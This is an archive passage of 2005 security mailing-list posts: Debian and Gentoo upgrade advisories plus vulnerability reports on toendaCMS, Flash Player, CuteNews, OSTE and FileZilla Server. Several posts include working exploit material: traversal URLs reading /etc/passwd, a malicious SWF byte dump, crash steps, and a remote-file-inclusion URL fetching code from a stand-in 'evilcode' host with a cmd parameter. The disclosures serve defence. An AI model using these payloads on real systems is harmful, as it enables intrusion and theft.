e2221d409ba1c8841ce4ecee981d7b61 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1_all.deb Size/MD5 checksum: 3432038 671d10d028345c0cfc133cc0504a2d50 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDbxYnW5ql+IAeqTIRAp50AKCu2u8rU/MHoFT+vgl7mRFrEGp8kACgtEBh NQhwCmoAsCjYCSlFbpsYcrU= =uGyV -END PGP SIGNATURE-
SEC Consult SA-20051107-0 :: toendaCMS multiple vulnerabilites
SEC-CONSULT Security Advisory 20051107-0 = title: toendaCMS multiple vulnerabilites program: toendaCMS vulnerable version: <0.6.2 homepage: www.toenda.com found: 2005-10-25 by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com = Vendor description: --- The toendaCMS Content Management and Weblogging tool gives you a modern, professional publishing system, based on an SQL and/or XML database. Vulnerabilty overview: --- toendaCMS contains various security flaws. These include: * theft of CMS usernames and passwords (XML database mode) * session theft (XML database mode) * directory traversal / reading of arbitrary files (XML database mode) * arbitrary file uploads Vulnerability details: --- 1) Account data is stored within the webroot (XML mode): http://tcms.webserver.com/data/tcms_user/.xml, where is string composed of 5 bytes (e.g. 2ac336ff0d.xml). Each XML file contains username (base64) and password (MD5) of a single user. This is particularly dangerous if the webserver allows directory listing. 2) Session data is stored within the webroot: http://tcms.webserver.com/engine/admin/.xml (XML mode). The session files are created once a user logs in to the CMS, so we just have to monitor this directory to steal his credentials. This is particularly dangerous if the webserver allows directory listing. 3) Directory Traversal / reading of arbitrary files (XML mode): http://tcms.webserver.com/engine/admin/admin.php?id_user= ../../../../../../etc/passwd 4) Arbitrary file uploads: Once we have gained access to the administrator interface, we can use the gallery scripts to upload arbitrary files to: http://tcms.webserver.com/data/images/albums/ No content-type or file validation checks are in place, so this is the easiest way to get shell access. Additional Remarks: --- These flaws were found during a pentest, in an environment with MAGIC_QUOTES_GPC activated. Please do NOT try to use toendaCMS without MAGIC_QUOTES and other safeguards, unless you plan to run a honeypot or have another particular reason for being very vulnerable. Vendor status: --- vendor notified: 2005-10-26 vendor response: 2005-10-30 patch available: 2005-11-01 The issues described in this advisory have been addressed in the latest version of toendaCMS (0.6.2 stable). Download at: http://www.toenda.com/de/data/files/Software/toendaCMS_Version_0.6.0_Stable/toendaCMS_0.6.2_Stable.zip General remarks --- We would like to apologize in advance for potential nonconformities and/or known issues. ~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2005 bmu at sec-consult dot com
SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption
SEC-CONSULT Security Advisory 20051107-1 === title: Macromedia Flash Player ActionDefineFunction Memory Corruption program: Macromedia Flash Plugin vulnerable version: flash.ocx v7.0.19.0 and earlier libflashplayer.so before 7.0.25.0 homepage: www.macromedia.com found: 2005-06-27 by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com === Vendor description: --- Macromedia Flash Player is the high performance, lightweight, highly expressive client runtime that delivers powerful and consistent user experiences across major operating systems, browsers, mobile phones and devices. Vulnerabilty: --- ActionScript is an ECMAScript-based programming language used for controlling Macromedia Flash movies and applications. In SWF files, Actionscript commands are represented by DoAction Tags embedded in frames. SEC Consult has found that parameters to ActionDefineFunction (ACTIONRECORD 0x9b) are not properly sanitized. Loading a specially crafted SWF leads to an improper memory access condition which can be used to crash flash player or may be exploited as a vector for code execution. This issue is similar to CAN-2005-2628 (as reported by eEye Digital Security on November 4, 2005) but affects a different function. Coincidentally, Macromedia has received our notification of this bug on the same day (June 27). Proof of Concept: --- A "malicious" flash movie dump: - [SetBackgroundColor] - TagID: 9 (size: 3 (short tag) - dump ->: \x43\x02\xff\x00\x00 - [DoAction] - TagID: 12 (size: 60 (short tag) - dump ->: \x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00 \x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43 \x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45 \x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00 - [ShowFrame] - TagID: 1 (size: 0 (short tag) - dump ->: \x40\x00 - [End] - TagID: 0 (size: 0 (short tag) - dump ->: \x00\x00 Recommended Fix: --- The issue has been addressed in MPSB05-07. Upgrade to the newest version of Flash Player 7 or to Flash Player 8. Link: http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html. Vendor status: --- vendor notified: 2005-06 fixed: 2005-09 General remarks --- We would like to apologize in advance for potential nonconformities and/or known issues. ~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2005 bmu at sec-consult dot com
Path disclosure in CuteNews <= 1.4.0
A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation path and other data. Bug exists in "index.php". Example: http://victim.com/index.php?subaction=showfull &id=1128227686&archive=../../../../../../etc/passwd%00&start_from=&ucat=1& Error: Warning: file(/storage/bg/myst/www/irc/cutenews/data/archives/../../../../../../../../../etc/passwd\0.news.arch): failed to open stream: No such file or directory in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 268 Warning: Invalid argument supplied for foreach() in /storage/bg/myst/www/irc/cutenews/inc/shows.inc.php on line 270 Can not find an article with id: 1128227686 --- Solution: Upgrade version 1.4.1 --- Original advisory: http://www.securityinfo.ru/2005/11/cutenews_140.html http://www.securityinfo.ru
OSTE v1.0 Remote Command Exucetion
This is a toplist script Web Site : http://oste.nerdie.org [site closed] Version : Only 1.0 anyway there is a piece :) Code : http://www.site.com/index.php?page=http://evilcode?&cmd= or www.site.com/?site=evilcode?&cmd= Google look for : OSTE v1.0 © 2003 Tyler Hall Thanks all Kurdish Hackers and friends Freedom For Ocalan!
Work in Progress: FileZilla Server Terminal V0.9.4d Buffer Overflow
** Inge Henriksen Security Advisory [EMAIL PROTECTED] ** I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d. The exploit is still to be considered as a work in progress as it is still not clear to me why the exploit works on some systems and not others. Please let me know if you manage to reproduce the exploit and perhaps we can figure out the differences. Stable Exploit Test System Microsoft Windows XP Professional Service Pack 2 (Build 2600) Tecnical Description The FileZilla Server has a user interface that is used to configure and monitor the FileZilla Server. By sending a long USER ftp command to the FileZilla Server a successfull attack may crash the FileZilla Server Terminal process. Note that the FileZilla Server itself does not crash. Proof of Concept The exploit is somewhat diffcult to exploit. On the stable exploit test system I have understood that the following steps will crash the FileZilla Server Terminal process: Start the FileZilla Server Start the FileZilla Server Terminal and login to the FileZilla Server started in step 1 Send the following USER commands; "USER A", "USER AA", "USER AAA" etc incrementing by one letter ("A") in the command. The FileZilla Server Terminal usually crashes after about 900-3000 "A"s' . The rpt file says the following: System details: --- Operating System: Microsoft Windows XP Professional Service Pack 2 (Build 2600) Processor Information: Vendor: GenuineIntel ,Speed: 1728MHz ,Type: Intel Pentium compatible,Number Of Processors: 1 ,Architecture: Intel ,Level: Pentium II/Pro,Stepping: 33-36 Memory Information: Memory Used 69%, Total Physical Memory 769328KB, Physical Memory Available 233460KB, Total Virtual Memory 2097024KB, Available Virtual Memory 2061140KB, Working Set Min : 200KB Max : 1380KB . Exception Details: -- Exception code: C005 ACCESS_VIOLATION Fault address: 7C910F29 01:FF29 C:\WINDOWS\system32\ntdll.dll Call stack: --- Address Frame Function SourceFile 7C910F29 0012FA9C 0001:FF29 C:\WINDOWS\system32\ntdll.dll 7C910D5C 0012FB70 0001:FD5C C:\WINDOWS\system32\ntdll.dll 00438A1A 0012FBAC 0001:00037A1A C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 00405049 0012FBD4 0001:4049 C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 0040562C 0012FC00 0001:462C C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 77D38734 0012FC2C 0001:7734 C:\WINDOWS\system32\USER32.dll77D38816 0012FC94 0001:7816 C:\WINDOWS\system32\USER32.dll 77D3C63F 0012FCC4 0001:B63F C:\WINDOWS\system32\USER32.dll77D3E905 0012FCE4 0001:D905 C:\WINDOWS\system32\USER32.dll 0045F924 0012FD58 0001:0005E924 C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 77D38734 0012FD84 0001:7734 C:\WINDOWS\system32\USER32.dll 77D38816 0012FDEC 0001:7816 C:\WINDOWS\system32\USER32.dll 77D389CD 0012FE4C 0001:79CD C:\WINDOWS\system32\USER32.dll 77D396C7 0012FE5C 0001:86C7 C:\WINDOWS\system32\USER32.dll
[SECURITY] [DSA 809-3] New squid packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 809-3 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 7th, 2005 http://www.debian.org/security/faq - -- Package: squid Vulnerability : assertion error Problem type : remote Debian-specific: no CVE ID : CAN-2005-2794 Debian Bug : 320035 Kosa Attila discovered that the security update DSA 809-2 contained a regression in the packages for the old stable distribution (woody). The orginal advisory text follows: Certain aborted requests that trigger an assertion in squid, the popular WWW proxy cache, may allow remote attackers to cause a denial of service. This update also fixes a regression caused by DSA 751. For the oldstable distribution (woody) this problem has been fixed in version 2.4.6-2woody11. We recommend that you upgrade your squid package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11.dsc Size/MD5 checksum: 614 341d5ba1daa6d5b4c997096a4116c782 http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11.diff.gz Size/MD5 checksum: 257997 65e0a384bde2fdb61d215b86b421b1be http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6.orig.tar.gz Size/MD5 checksum: 1081920 59ce2c58da189626d77e27b9702ca228 Alpha architecture: http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_alpha.deb Size/MD5 checksum: 817194 c9b35cf30db2598f1fe8c5a4b5d842dd http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_alpha.deb Size/MD5 checksum:76148 f9310bc22c747405959b1a548765f48e http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_alpha.deb Size/MD5 checksum:60940 a3032f47551bfc3a53623631f2fda3f1 ARM architecture: http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_arm.deb Size/MD5 checksum: 727402 3cb96a5aa6b00203ea2f8ca447ff21ae http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_arm.deb Size/MD5 checksum:73928 2dc73eb6c00e423056ea6fccf7ef0855 http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_arm.deb Size/MD5 checksum:59250 6d4a9adeffca56d10026dd775ea1766c Intel IA-32 architecture: http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_i386.deb Size/MD5 checksum: 685502 0ac74ef690c17e054f7c1d9a0319d7de http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_i386.deb Size/MD5 checksum:74448 873b78ff72c7bf4dd6497228a50fe3f5 http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_i386.deb Size/MD5 checksum:58946 fcd7e84899b7e0cc7b5290899f9b95ec Intel IA-64 architecture: http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_ia64.deb Size/MD5 checksum: 955144 956ca54bbec7ee77f4e53f62f5078bd0 http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_ia64.deb Size/MD5 checksum:79996 6bba69eaedc04ccacc73191750eb65bc http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_ia64.deb Size/MD5 checksum:63612 12d098851265c912a45c20fb66528bf6 HP Precision architecture: http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_hppa.deb Size/MD5 checksum: 780488 8eae73112548261c5d9cb52c39468c73 http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_hppa.deb Size/MD5 checksum:75376 6a9c3c90ab04d5594387c07f1086f3f6 http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_hppa.deb Size/MD5 checksum:60400 7b0c999f8016a93fa2c804003e8997ba Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_m68k.deb Size/MD5 checksum: 667508 37917b970bd277c5e33d44aa7193d4e1 http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_m68k.deb Size/MD5 checksum:73258 9de2cd08019e7fdd6ab5ed9e4fd191b0 http://security.
[SECURITY] [DSA 885-1] New OpenVPN packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 885-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 7th, 2005 http://www.debian.org/security/faq - -- Package: openvpn Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2005-3393 CVE-2005-3409 CERT advisory : BugTraq ID : 15239 Debian Bug : 336751 337334 Several vulnerabilities have been discovered in OpenVPN, a free virtual private network daemon. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2005-3393 A format string vulnerability has been discovered that could allow arbitrary code to be executed on the client. CVE-2005-3409 A NULL pointer dereferencing has been discovered that could be exploited to crash the service. The old stable distribution (woody) does not contain openvpn packages. For the stable distribution (sarge) these problems have been fixed in version 2.0-1sarge2. For the unstable distribution (sid) these problems have been fixed in version 2.0.5-1. We recommend that you upgrade your openvpn package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2.dsc Size/MD5 checksum: 629 1cea04a008a9b888b404c7ec2e5c2ef2 http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2.diff.gz Size/MD5 checksum:52800 a48a32ae512664fa21ac2f18b13aca8b http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0.orig.tar.gz Size/MD5 checksum: 639201 7401faebc6baee9add32608709c54eec Alpha architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_alpha.deb Size/MD5 checksum: 347438 9dcec8dd6cdf3efcaea58097a526d95d AMD64 architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_amd64.deb Size/MD5 checksum: 316598 34e437c2b5c671a0945e23dc314c7d61 ARM architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_arm.deb Size/MD5 checksum: 296726 7eb2f74d7f6334aa864638b18261e6ed Intel IA-32 architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_i386.deb Size/MD5 checksum: 302630 b48bfb10468d6177ca5825382a5b9f3a Intel IA-64 architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_ia64.deb Size/MD5 checksum: 395760 ca6d5c797d96fccf4ff785406bc9cd8c HP Precision architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_hppa.deb Size/MD5 checksum: 316894 d8a83c52f67b478a7ac2481411b4850c Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_m68k.deb Size/MD5 checksum: 276658 fb776634c4805ce5b3c98b34c244b8b8 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_mips.deb Size/MD5 checksum: 317832 400f6f80ece6d8937aca0500a47aaba8 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_mipsel.deb Size/MD5 checksum: 319656 ea3d192a110f8231ac4146490cd4ab46 PowerPC architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_powerpc.deb Size/MD5 checksum: 309090 8baabfbe69032a23414ca0e97caec7b9 IBM S/390 architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_s390.deb Size/MD5 checksum: 307492 c63d7c1f5ac2f469ecfdee8673da39d4 Sun Sparc architecture: http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_sparc.deb Size/MD5 checksum: 295050 913b178ac53ea6676600200c95be4f46 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package
[SECURITY] [DSA 886-1] New chmlib packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 886-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 7th, 2005 http://www.debian.org/security/faq - -- Package: chmlib Vulnerability : several Problem type : local (remote) Debian-specific: no CVE IDs: CVE-2005-2659 CVE-2005-2930 CVE-2005-3318 BugTraq ID : 15211 Several vulnerabilities have been discovered in chmlib, a library for dealing with CHM format files. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2005-2659 Palasik Sandor discoverd a buffer overflow in the LZX decompression method. CVE-2005-2930 A buffer overflow has been discovered that could lead to the execution of arbitrary code. CVE-2005-3318 Sven Tantau discoverd a buffer overflow that could lead to the execution of arbitrary code. The old stable distribution (woody) does not contain chmlib packages. For the stable distribution (sarge) these problems have been fixed in version 0.35-6sarge1. For the unstable distribution (sid) these problems have been fixed in version 0.37-2. We recommend that you upgrade your chmlib packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.dsc Size/MD5 checksum: 604 022d55ea43ef4a54648b0823163c4a07 http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.diff.gz Size/MD5 checksum:15698 55eeab9a32a66c5e123ab51f3d7427df http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35.orig.tar.gz Size/MD5 checksum: 368428 8fa0e692b2606a03fb51589f66a82eec Alpha architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_alpha.deb Size/MD5 checksum:25688 2471920dc5214b95a44e50e2a8800ada http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_alpha.deb Size/MD5 checksum:18576 0b1d802a79cea68c00d36cd9cb7a36cd http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_alpha.deb Size/MD5 checksum:25544 23306cc3f7b0772f744707c86fa9258a AMD64 architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_amd64.deb Size/MD5 checksum:23748 e5a72c3311e7b00d6295a75f7bb37560 http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_amd64.deb Size/MD5 checksum:16928 8a2d68579e364a284c03dcc4b9a01e37 http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_amd64.deb Size/MD5 checksum:22564 50d2a8d694d1bf7251d18b4f7b02ede7 ARM architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_arm.deb Size/MD5 checksum:25242 ec14b38be010c3f1fee93dd618124c5e http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_arm.deb Size/MD5 checksum:15962 5e1ec37635078cc29b9f2a4f91f9b20e http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_arm.deb Size/MD5 checksum:24000 bc84ed2d77918f6eb4378f35f43cd4e5 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_i386.deb Size/MD5 checksum:24872 fbea0ba2924295a9f553c346eeb164af http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_i386.deb Size/MD5 checksum:16094 de94d72e5414d1b218fd32f11cd7351b http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_i386.deb Size/MD5 checksum:22872 3e37bda96c284423f467aecb88e8dc98 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_ia64.deb Size/MD5 checksum:28504 ef19dde34158fa817781c685d2499cbb http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_ia64.deb Size/MD5 checksum:19348 e15dc8288ba0a0bee7a9490c4fe653de http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_ia64.deb Size/MD5 checksum:27268 497388fcd7e08a7558dde96082b2707a HP Precision architecture: http://security.debian.org/pool
[SECURITY] [DSA 888-1] New OpenSSL packages fix cryptographic weakness
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 888-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 7th, 2005 http://www.debian.org/security/faq - -- Package: openssl Vulnerability : cryptographic weakness Problem type : remote Debian-specific: no CVE ID : CVE-2005-2969 Yutaka Oiwa discovered a vulnerability in the Open Secure Socket Layer (OpenSSL) library that can allow an attacker to perform active protocol-version rollback attacks that could lead to the use of the weaker SSL 2.0 protocol even though both ends support SSL 3.0 or TLS 1.0. The following matrix explains which version in which distribution has this problem corrected. oldstable (woody) stable (sarge) unstable (sid) openssl 0.9.6c-2.woody.8 0.9.7e-3sarge1 0.9.8-3 openssl 094 0.9.4-6.woody.4 n/a n/a openssl 095 0.9.5a-6.woody.6n/a n/a openssl 096 n/a 0.9.6m-1sarge1n/a openssl 097 n/an/a0.9.7g-5 We recommend that you upgrade your libssl packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8.dsc Size/MD5 checksum: 632 0f3990f71f6773a516a413c393fc6604 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8.diff.gz Size/MD5 checksum:45527 30aa51e1f88c95e086f7918a47fe8f5c http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c.orig.tar.gz Size/MD5 checksum: 2153980 c8261d93317635d56df55650c6aeb3dc Architecture independent components: http://security.debian.org/pool/updates/main/o/openssl/ssleay_0.9.6c-2.woody.8_all.deb Size/MD5 checksum: 982 71fd036f7135cd3e68c4cf33ed7e2976 Alpha architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_alpha.deb Size/MD5 checksum: 1551638 2f5d722aa4b7c7bd6c9908a3998b6420 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_alpha.deb Size/MD5 checksum: 571552 5e94a096f7569a2e18f82a697908d230 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_alpha.deb Size/MD5 checksum: 736780 2f964e236883e2c8ed7ad2d28ed2bc6b ARM architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_arm.deb Size/MD5 checksum: 1358314 c2f4acf9994dd42ae0373c34163b6a96 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_arm.deb Size/MD5 checksum: 474348 bc3950a119bd05ab4602fc1aae42f6c0 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_arm.deb Size/MD5 checksum: 730164 c5cc5638fb9ca1583cc23602b61a6dc7 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_i386.deb Size/MD5 checksum: 1289480 0d32fea022a7896b321d673a9138c90f http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_i386.deb Size/MD5 checksum: 461972 970aa086b6758741b4cbbf32e94572a1 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_i386.deb Size/MD5 checksum: 717322 88a3bcb5d1b4330fb25c95b5c7f95bd3 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_ia64.deb Size/MD5 checksum: 1615580 e66ad48cf480c87a965cad2dadde3074 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_ia64.deb Size/MD5 checksum: 711412 a7ff065df8383c36ee0e265d889df450 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_ia64.deb Size/MD5 checksum: 763808 a62f8d33db6e9bc3e770dfd3f23fe70f HP Precision architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_hppa.deb Size/MD5 checksum: 1435394 5d5be2d74a8035fdee039237f93ad267 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_hppa.deb Size/MD5 check
Re: Zoomblog HTML Injection Vulnerability
> Zoomblog is prone to HTML injection attacks. It is possible for a > malicious Zoomblog user to inject hostile HTML and script code into > the commentary via form fields. This bug was corrected on Nov.4th. Also, the "Zoomblog BBCode Tag JavaScript Injection Vulnerability" was corrected on Nov.5th. Regards, Rogelio http://www.zoomblog.com/
[ GLSA 200511-05 ] GNUMP3d: Directory traversal and XSS vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GNUMP3d: Directory traversal and XSS vulnerabilities Date: November 06, 2005 Bugs: #109667 ID: 200511-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis GNUMP3d is vulnerable to directory traversal and cross-site scripting attacks that may result in information disclosure or the compromise of a browser. Background == GNUMP3d is a streaming server for MP3s, OGG vorbis files, movies and other media formats. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/gnump3d < 2.9.7>= 2.9.7 Description === Steve Kemp reported about two cross-site scripting attacks that are related to the handling of files (CVE-2005-3424, CVE-2005-3425). Also reported is a directory traversal vulnerability which comes from the attempt to sanitize input paths (CVE-2005-3123). Impact == A remote attacker could exploit this to disclose sensitive information or inject and execute malicious script code, potentially compromising the victim's browser. Workaround == There is no known workaround at this time. Resolution == All GNUMP3d users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-sound/gnump3d-2.9.7" References == [ 1 ] CVE-2005-3123 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123 [ 2 ] CVE-2005-3424 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3424 [ 3 ] CVE-2005-3425 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3425 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpTgdh7vgPpV.pgp Description: PGP signature
[ GLSA 200511-04 ] ClamAV: Multiple vulnerabilities
